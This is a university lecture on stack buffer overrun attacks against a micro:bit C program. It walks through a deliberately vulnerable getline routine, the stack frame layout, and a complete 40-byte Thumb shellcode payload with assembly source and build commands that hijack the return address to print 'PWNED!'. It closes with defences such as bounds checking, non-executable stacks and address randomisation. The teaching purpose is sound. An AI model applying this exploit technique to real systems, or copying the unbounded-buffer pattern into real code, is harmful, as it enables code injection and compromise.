Lecture 7 – Buffer overrun attacks (Digital Systems)

The victim

One day, an Oxford undergraduate was conscientiously doing his IP1 practical, using C and the micro:bit instead of Scala and some bloated AMD64 machine with gigabytes of RAM. Here is the code that he wrote:

/* getnum -- read a line of input and convert to a number */
int getnum(void) {
    char buf[32];
    getline(buf);
    return atoi(buf);
}

void init(void) {
    int milk[10], total;

    serial_init();

    for (int i = 0; i < 10; i++) {
        int x = getnum();
        milk[i] = x;
        serial_printf("Input %d = %d\r\n", i, x);
    }

    total = 0;

    for (int i = 0; i < 10; i++)
        total += milk[i];
    
    serial_printf("Total = %d\r\n", total);    
}   

That doesn't look too bad, does it? There's a subroutine getnum that reads a line of input and converts it into a number, and the main program uses it to read 10 numbers and store them in an array, printing them out as it does so. Finally, the main program adds together all of the numbers and prints the total. But already this program contains a horrendous bug, which will allow us, by feeding it carefully crafted input, to subvert it and run any code that we like. To show our power, we will force the program to print the string PWNED!.

The flaw in the program is in the interface of the subroutine getline(buf) called from getnum. This takes as parameter (the address of) a character array buf that will be used to store the characters in the line. But disastrously, getline does not know the length of the array it is passed, so cannot check whether the input line is longer than the array. It is this weakness we shall exploit.

Context

This sort of sloppy programming is very common in C. It does little damage if the program is quickly written, used only locally, and quickly discarded. In other contexts, as we'll see, more care is very much needed to avoid security problems. Routines in the C library such as gets – the same as getline here – are rightly deprecated for their unsafety. There's an alternative function fgets(buf, n, fp) that can read from an arbitrary file fp, not just the standard input, but crucially also accepts the maximum number of characters n that will fit in buf.
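As a minimal sketch of the safer style, here is how getnum might look on a host machine if it were written with fgets. The name getnum_from and the policy of silently discarding the tail of an over-long line are assumptions made for this illustration; they are not part of the practical.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* getnum_from -- read a line from fp and convert it to a number.
   Hypothetical bounded variant of getnum; returns 0 at end of file. */
int getnum_from(FILE *fp) {
    char buf[32];

    assert(fp != NULL);

    /* fgets stores at most sizeof buf - 1 characters, then a '\0' */
    if (fgets(buf, sizeof buf, fp) == NULL)
        return 0;

    /* No newline stored means the line did not fit: discard the rest,
       so that it is not mistaken for the next line of input */
    if (strchr(buf, '\n') == NULL) {
        int c;
        while ((c = getc(fp)) != EOF && c != '\n')
            ;
    }

    return atoi(buf);
}
```

Calling getnum_from(stdin) ten times would replace the ten calls of getnum; however long the input line, nothing is ever written beyond the 32 bytes of buf.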

Mounting the specimen

We can imagine getline using the serial port to get characters from the keyboard, and then storing them in the array. But to make our experiments easier, let's replace it with a version that replays a canned script.

#define MARK 0x7f

static const char script[];

/* getline -- copy a line of input into buf. */
void getline(char *buf) {
    // Note failure to check the length of buf
    static const char *p = script;
    char *q = buf;

    while (*p != MARK) *q++ = *p++;
    p++; *q = '\0';
}

This routine keeps track of the place we've reached in a fixed array script, and copies the next line from that array into buf, up to the next MARK character. I've chosen MARK to have an unusual value (rather than, say, 0), because we're going to be stuffing in some text later that contains all sorts of weird characters, but not, luckily, the character with code 0x7f. It's hard to type such strange text on a keyboard, and that's part of the reason for replaying canned input. In real life, we can imagine writing an attack program that sends a carefully crafted network packet containing whatever weird bytes are needed.

We can define the script array later in the program, like this:

static const char script [] = {
    '1', MARK,
    '1', '2', '3', MARK,
    '-', '1', '0', MARK,
    '0', MARK,

    0x8a, 0xb0, 0x03, 0xa0,
    0x01, 0x49, 0x88, 0x47,
    0xfe, 0xe7, 0x00, 0x00,
    0x79, 0x01, 0x00, 0x00,
    0x50, 0x57, 0x4e, 0x45,
    0x44, 0x21, 0x0d, 0x0a,
    0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x99, 0x3f, 0x00, 0x20,
    MARK
};

The first few lines contain the numbers 1, 123, -10, 0 – not all of them sensible for the Milk Bill application, but hey! Then comes our carefully crafted input, expressed here as a sequence of 40 hexadecimal constants. Running the program with this input produces evidence of the hack:

Input 0 = 1                                                                    
Input 1 = 123                                                                   
Input 2 = -10                                                                   
Input 3 = 0                                                                     
PWNED!

Planning the attack

So what are those 40 magic characters, and how were they determined?

First, we notice that there are 40 characters, and the buffer declared locally in getnum has space for only 32 characters. Crucially, the getline subroutine doesn't detect this, and it can't because it knows only the address of the buffer, not its size. Our friend obviously thought 32 characters was plenty for any input number; don't be too hard on him – we've all done the same. The first 32 characters of the line fill up the buffer, and the remaining 8 are written by getline into the space beyond it, overwriting whatever the program was storing there. To understand what is overwritten, and how this leads to subversion of the program, we need to look at the layout of getnum's stack frame.

    +--------------------------------+
    | Return address                 |
    +--------------------------------+
    | One word of padding            |
    +--------------------------------+
    |                                |
    | 8 words for array buf          |
sp: |                                |
    +--------------------------------+
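The same picture can be written down as a C struct, lowest address first, which makes the offsets easy to check. This is only a model for reasoning about the frame: the struct and its field names are invented here, and the compiler never declares any such type.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model of getnum's stack frame, lowest address first */
struct getnum_frame {
    char buf[32];             /* the stack pointer points here */
    uint32_t padding;         /* one word of padding */
    uint32_t return_address;  /* where getnum will return to */
};

/* The return address lies 36 bytes above the start of buf,
   so a 40-byte input line reaches exactly to the end of it */
static_assert(offsetof(struct getnum_frame, return_address) == 36,
              "return address should follow buffer and padding");
static_assert(sizeof(struct getnum_frame) == 40,
              "frame should occupy ten words");
```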

We can deduce the layout of getnum's frame by looking at its code, obtained by disassembling the program.

00000108 <getnum>:
 108:	b500      	push	{lr}
 10a:	b089      	sub	sp, #36	; 0x24
 10c:	4668      	mov	r0, sp
 10e:	f7ff fffe 	bl	d8 <getline>
 112:	4668      	mov	r0, sp
 114:	f7ff fffe 	bl	0 <atoi>
 118:	b009      	add	sp, #36	; 0x24
 11a:	bd00      	pop	{pc}

As you can see, getnum initially saves its return address with push {lr}, then decrements the stack pointer by 36 bytes – that is, the 32 bytes for the buf array, and another 4 bytes it includes because the compiler likes to keep the stack pointer evenly divisible by 8. (This 8-byte stack alignment is irrelevant to the Cortex-M0, but is sometimes needed on bigger chips.) The parameter that getnum passes to getline in r0 is equal to the stack pointer, so we can see that buf is located right where the stack pointer points.
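If you want to check the disassembler's arithmetic for yourself, the 16-bit Thumb instructions that adjust sp by a constant have the bit pattern 1011 0000 S iiiiiii, where S is 0 for add and 1 for sub, and the seven-bit field counts words rather than bytes. The helper below is a sketch written for these notes (sp_adjustment is a made-up name) that decodes just this one instruction format.

```c
#include <assert.h>
#include <stdint.h>

/* sp_adjustment -- decode a Thumb "add sp, #imm" or "sub sp, #imm"
   instruction and return the signed change to sp in bytes.
   Hypothetical helper: handles only the form 1011 0000 S iiiiiii. */
int sp_adjustment(uint16_t instr) {
    /* Reject anything that is not an sp-adjusting instruction */
    assert((instr & 0xff00) == 0xb000);

    int bytes = (instr & 0x7f) * 4;           /* imm7 counts words */
    return (instr & 0x80) ? -bytes : bytes;   /* S = 1 means subtract */
}
```

Applied to the halfwords b089 and b009 from the listing, this gives a decrease of 36 bytes on entry and an increase of 36 bytes on exit.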

Is it fair to disassemble the target program and use this information to mount our attack? Yes, of course: in real life, we might be attacking a particular release of [a popular web browser], and we can download the code and study it to our heart's content, EULA notwithstanding.

Ok, we will make our attack string contain 32 bytes to fill up the buffer, another four bytes for the word of padding, and then the next four bytes of the string will overwrite the return address of getnum with a value of our choosing. By doing this, we can arrange that when getnum returns, it will be to a place that we can control. We'll choose that place to be the buffer itself, and arrange that the data put in the buffer is the code we'd like to run. But where will the buffer be in memory? We can find that out by running the program on a test machine with the debugger, stopping it in getnum, and writing down the value of the stack pointer. That will allow us to calculate the address of each part of our attack string once it is copied into the buf array by the victim. In a more complicated program, different calls to getnum might be made in different contexts, and there may be several possible values for the stack pointer; here there is only one.

The layout we plan for the attack string is like this:

32 bytes of code
Another 4 bytes of zeroes
Address of the code
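To make the layout concrete, here is a sketch in C of a routine that assembles such a string from its three parts. The function build_payload and its parameters are invented for this illustration; the demonstration itself builds the string with the assembler, not like this. The +1 added to the address marks the target as Thumb code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum { BUF_SIZE = 32, PAYLOAD_SIZE = 40 };

/* put_word -- store a 32-bit value in little-endian byte order */
static void put_word(uint8_t *dst, uint32_t w) {
    for (int i = 0; i < 4; i++)
        dst[i] = (uint8_t)(w >> (8 * i));
}

/* build_payload -- lay out code, padding and return address.
   Hypothetical helper; frame is the address that buf will have. */
void build_payload(uint8_t out[PAYLOAD_SIZE], const uint8_t *code,
                   size_t code_len, uint32_t frame) {
    assert(code_len <= BUF_SIZE);

    memset(out, 0, PAYLOAD_SIZE);            /* zero fill and padding word */
    memcpy(out, code, code_len);             /* code at the start of buf */
    put_word(out + BUF_SIZE + 4, frame + 1); /* new return address */
}
```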

There's one more piece of information we need to formulate the attack string, and that's the address of the subroutine serial_printf, which we can use to print our message (and a ransom note). We can find that by disassembling the program or by looking in the map file output by the linker. If our target is open source, we can get all this information freely; if not, we might need to poke about a bit more with a disassembler, but it's not rocket science.

After getline has overwritten the stack frame of getnum, it returns control to getnum as usual. The rest of getnum's body then runs, with a call to atoi that presumably returns 0, having found no digits in the buffer. Then getnum returns to our chosen return address, and the code we placed in the buffer starts to run.
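We can rehearse the overwriting safely on a host machine by modelling the stack as an ordinary array of bytes. The sketch below is a model, not the victim program: simulate_overrun, the 64-byte model of memory, and the offsets are assumptions taken from the frame layout described earlier. It runs the same unchecked copying loop as getline and reports the value that getnum would then load into the pc.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MARK 0x7f

enum { RETURN_OFFSET = 36, MODEL_SIZE = 64 };

/* simulate_overrun -- copy one script line into a model of the stack
   and return the word left in the return address slot.
   Hypothetical host-side model; stack[0] stands for the byte at sp. */
uint32_t simulate_overrun(const uint8_t *line, uint32_t saved_return) {
    uint8_t stack[MODEL_SIZE];
    size_t len = 0;

    /* Keep the model itself in bounds: line plus terminator must fit */
    while (line[len] != MARK) len++;
    assert(len < MODEL_SIZE);

    /* The frame before the call: zeroes, with the return address on top */
    memset(stack, 0, sizeof stack);
    for (int i = 0; i < 4; i++)
        stack[RETURN_OFFSET + i] = (uint8_t)(saved_return >> (8 * i));

    /* The loop from getline: nothing stops it at the end of buf */
    const uint8_t *p = line;
    uint8_t *q = stack;
    while (*p != MARK) *q++ = *p++;
    *q = '\0';

    /* Reassemble the little-endian word that getnum would pop */
    uint32_t ret = 0;
    for (int i = 0; i < 4; i++)
        ret |= (uint32_t)stack[RETURN_OFFSET + i] << (8 * i);
    return ret;
}
```

A short line such as 123 leaves the saved return address untouched, but a 40-byte line replaces it with whatever its last four bytes spell out.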

Context

The layout of the stack frame for getnum is typical of many machines. Details will differ: for example, we can expect the return address to appear at different offsets from the start of the buffer. What most buffer overrun attacks have in common is that the return address of a subroutine can be overwritten by overflowing a buffer embedded in the stack frame.

Building a binary

We could piece together the attack string byte by byte, hardware manual in hand. But it's neater to use the assembler: here's the assembly language source for what we want, including the addresses we determined earlier:

    .syntax unified

    .equ printf, 0x178      @ Address of serial_printf
    .equ frame, 0x20003f98  @ Captured stack pointer value in getnum

    .text
    @@ Our malicious code
attack:
    sub sp, #40             @ Reserve stack space again
    adr r0, message         @ Address of our message
    ldr r1, =printf+1       @ Absolute address for call
    blx r1                  @ Call printf
    b .                     @ Spin forever
    .pool                   @ Place constant pool here
message:
    .asciz "PWNED!\r\n"
    .align 5, 0             @ Fill up rest of buffer

    @@ One extra word of padding
    .word 0

    @@ The return address
    .word frame+1

By the time this code is reached, getnum will have deallocated the stack space that was used for the buffer, so the first task is to adjust the stack pointer, so that when we later call serial_printf, its stack frame will not overwrite our code. Then there is a call that passes the message to serial_printf, for simplicity calling it by first putting its absolute address in a register; the +1 is to mark it as Thumb code.[1] Then the code enters an infinite loop while we wait for the ransom to be sent – in Bitcoin, naturally.

Some details to dispel any mystery:

  • The directive .pool places the constant printf+1 here in memory and fixes up the earlier ldr = instruction to refer to it.
  • The directive .asciz stores the characters of our message, terminated C-style with a zero byte.
  • The directive .align 5, 0 pads the program with zero bytes (0) until its size is a multiple of 32 = 2^5.
  • Each .word directive contributes a four-byte word to the output of the assembler.
  • The .equ directives give the numeric value of the symbols printf and frame, obtained in earlier experiments.
  • We use a blx reg instruction instead of bl label just because it's marginally inconvenient to determine the displacement for bl, and an absolute address is easier to deal with.

There's a makefile that automates the process of building the demonstration. First, we can assemble the file attack.s into an object file attack.o.

arm-none-eabi-as -mcpu=cortex-m0 -mthumb attack.s -o attack.o

Next, we use objcopy to turn the .o file into a binary image.

arm-none-eabi-objcopy -O binary attack.o attack.bin

Then we can use the hexdump utility to format the binary data as a sequence of hexadecimal bytes.

hexdump -v -e '4/1 "0x%02x, " "\n"' attack.bin >attack

The file attack then contains the 40 bytes shown earlier as part of the value of script. I pasted in the text there, but in the demonstration source I used a #include directive to automate the process.

Disassembling the file attack.o shows the correspondence between the input to the assembler and the 40 bytes that make up the attack string. Note that the little-endian byte order means that each word should be read in digit-pairs from right to left.

00000000 <attack>:
   0:	b08a      	sub	sp, #40	; 0x28
   2:	a003      	add	r0, pc, #12	; (adr r0, 10 <message>)
   4:	4901      	ldr	r1, [pc, #4]	; (c <attack+0xc>)
   6:	4788      	blx	r1
   8:	e7fe      	b.n	8 <attack+0x8>
   a:	0000      	.short	0x0000
   c:	00000179 	.word	0x00000179

00000010 <message>:
  10:	454e5750 	.word	0x454e5750
  14:	0a0d2144 	.word	0x0a0d2144
	...
  24:	20003f99 	.word	0x20003f99

To be fair, quite a lot of the 40 bytes are zeroes, which a routine designed to read a line of input might ignore or treat as the end of the line. There is even a carriage return character 0x0d followed by a newline character 0x0a, and those might not get past the input routine either. But most of the zeroes are padding that could be replaced by any character, and it would require only a little ingenuity to devise code that, when assembled, did not contain the other troublesome characters. A subroutine that read a network packet might well have no restrictions on the bytes that the packet could contain.

Defence against the dark arts

This example shows just how easy it is to write code with accidental vulnerabilities. There are many things that can be done to prevent such vulnerabilities from being exposed.

  1. We could use a programming language that makes it more difficult to pass around the addresses of buffers without also passing and checking their size.
  2. This attack depends on executing code that has been received as data: in the example, that code is stored in the region of memory that is used for the stack. On machines more sophisticated than the micro:bit, it's often possible to forbid executing code from anywhere but the code segment of the program.
  3. Some microcontrollers have separate address spaces for program and data, and that makes it difficult to execute data as instructions by accident. Nevertheless, there has to be some way of doing it, or such microcontrollers would not be able to update their own firmware under program control, and that is a useful feature.
  4. The attack depended on knowing a couple of addresses – the address of the getnum stack frame and the address of the existing printf subroutine. By randomising the layout of memory for each run of the program, it can be made more difficult to predict where such things will be found.

Linux has at least some of these defences enabled by default, so repeating the attack there is rather more difficult.
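C will not enforce the discipline in point 1, but we can follow it by hand. As a sketch, here is a bounded counterpart of the script-replaying getline that is told the size of the buffer and never writes beyond it. The name replay_line, the explicit cursor parameter, and the choice to truncate over-long lines are all assumptions made for this example.

```c
#include <assert.h>
#include <stddef.h>

#define MARK 0x7f

/* replay_line -- copy the next script line into buf, storing at most
   size-1 characters and a terminating '\0'.  Advances *pp past the
   MARK and returns the full length of the line, so that the caller
   can detect truncation.  Hypothetical bounded variant of getline. */
size_t replay_line(const char **pp, char *buf, size_t size) {
    const char *p = *pp;
    size_t n = 0;

    assert(size > 0);

    while (*p != MARK) {
        if (n < size - 1) buf[n] = *p;   /* drop what does not fit */
        n++; p++;
    }

    buf[n < size ? n : size - 1] = '\0';
    *pp = p + 1;
    return n;
}
```

A caller such as getnum would pass sizeof buf as the third argument, and could treat a result of sizeof buf or more as an input error rather than carrying on with a truncated number.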


  1. That is to say, the blx r1 instruction on bigger ARM processors is capable of switching between Native ARM and Thumb modes, according to the least significant bit in the register r1 – that is the significance of the x in the mnemonic blx. The function serial_printf is in Thumb code, so even on the Cortex-M0, we must carefully keep the processor in Thumb mode when calling it: hence the +1. For the same reason, the return address we plant in place of getnum's original return address also has a +1.

The 64-bit variant of the Intel architecture used in PCs. So called because the instruction set extensions to support 64 bits were first introduced on chips designed by Advanced Micro Devices. Also known as x86_64.

The address of the next instruction after a call of a procedure. When the procedure returns, execution continues from this point.

A register sp that holds the address of the most recent occupied word of the subroutine stack. On ARM, as on most recent processors, the subroutine stack grows downwards, so that the sp holds the lowest address of any occupied word on the stack.

A report produced by the linker, showing what library modules were included in the program, and for each module where in the program image it has been put.

A symbolic representation of the machine code for a program.

An alternative instruction encoding for the ARM in which each instruction is encoded in 16 rather than 32 bits. The advantage is compact code, the disadvantage that only a selection of instructions can be encoded, and only the first 8 registers are easily accessible. In Cortex-M microcontrollers, the Thumb encoding is the only one provided.

A computer with byte-addressed memory is little-endian if the least significant byte of a multi-byte integer in memory is the one with the lowest address, the same as the address of the word itself. Thus on the ARM as conventionally configured, if the integer 0x1a2b3c4d is stored at address 0x1000, then byte 0x1000 in the memory contains 0x4d, byte 0x1001 contains 0x3c, byte 0x1002 contains 0x2b, and byte 0x1003 contains 0x1a. At first, this seems counter-intuitive, until you realise that the real problem is the way we write numbers in everyday life, with the digit worth 10^0 at the end, and the one worth 10^(n-1) at the beginning.